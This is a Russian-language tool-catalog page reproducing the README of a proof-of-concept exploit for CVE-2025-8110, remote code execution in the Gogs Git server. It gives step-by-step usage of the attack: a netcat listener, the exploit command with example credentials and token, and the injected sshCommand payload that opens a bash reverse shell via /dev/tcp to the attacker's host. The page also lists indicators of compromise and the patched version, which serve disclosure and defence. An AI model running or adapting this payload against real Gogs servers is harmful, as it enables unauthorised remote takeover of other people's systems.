Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2025-8110 — Gogs RCE PoC - CVE-2025-8110 | Kitploit
Инструменты/GitHubGitHub/x4brozer/cve-2025-8110
Анализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийТестирование на ПроникновениеRed TeamingРазработка Полезной Нагрузки
GitHubx4brozer/cve-2025-8110

CVE-2025-8110

Gogs RCE PoC - CVE-2025-8110

Репозиторий
4 месяцев назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

Gogs RCE Exploit (CVE-2025-8110)

Python License

Доказательство концепции для CVE-2025-8110 — удалённое выполнение кода в Gogs через обход символической ссылки и внедрение sshCommand.

Описание

Этот эксплойт использует обход символической ссылки в API Gogs, чтобы перезаписать .git/config и внедрить вредоносный sshCommand, который выполняет обратную оболочку.

Требования

  • Python 3.12+
  • Установленный Git
  • Действительные учётные данные Gogs
  • API-токен Gogs

Установка

root@kitploit:~
git clone https://github.com/X4BROZER/CVE-2025-8110.git
cd CVE-2025-8110
pip install -r requirements.txt

Аргумент Описание -u, --url Целевой URL Gogs (например, http://target:3000) -U, --username Имя пользователя Gogs -P, --password Пароль Gogs -t, --token API-токен Gogs -lh, --host Ваш IP для обратной оболочки -lp, --port Ваш порт для прослушивателя -x, --proxy Включить прокси (localhost:8080)

Скачать инструмент

Использование

Шаг 1: Получите API-токен

Войдите в Gogs → Настройки → Приложения → Создать токен

Шаг 2: Запустите прослушиватель

root@kitploit:~
nc -lvnp 4444

Шаг 3: Запустите эксплойт

root@kitploit:~
python3 exploit.py -u http://target:3000 -U <USERNAME GOGS> -P <PASSWORD GOGS> -t <TOKEN> -lh <ATTACKER IP> -lp <ATTACKER PORT>

Пример

root@kitploit:~
python3 exploit.py -u http://localhost:3001 -U amine -P amine -t 44f4e64a1e6353f247050055aa0d3cc13b577ac3 -lh 10.10.17.134 -lp 4444

Как это работает

Создаёт репозиторий с символической ссылкой на .git/config

Использует API PutContents для записи в символическую ссылку

Внедряет sshCommand = bash -c 'bash -i >& /dev/tcp/IP/PORT 0>&1' #

Gogs выполняет команду → обратная оболочка

Устранение неполадок Проблема Решение Не удалось войти Проверьте имя пользователя/пароль Не удалось создать репозиторий Перегенерируйте API-токен Таймаут чтения Нормально — проверьте прослушиватель Нет оболочки Проверьте файрвол, попробуйте другой порт Индикаторы компрометации Случайные имена репозиториев из 8 символов

Символическая ссылка malicious_link в репозиториях

sshCommand в .git/config

Устранение уязвимости Обновитесь до Gogs v0.13.4 или новее:

root@kitploit:~
wget https://dl.gogs.io/v0.13.4/gogs_v0.13.4_linux_amd64.tar.gz
tar -xzf gogs_v0.13.4_linux_amd64.tar.gz

Правовое предупреждение Этот инструмент предназначен только для образовательного и авторизованного тестирования. Несанкционированный доступ является незаконным.

Авторы Обнаружение: Wiz Research

Оригинальный PoC: zAbuQasem

Эксплойт: X4BROZER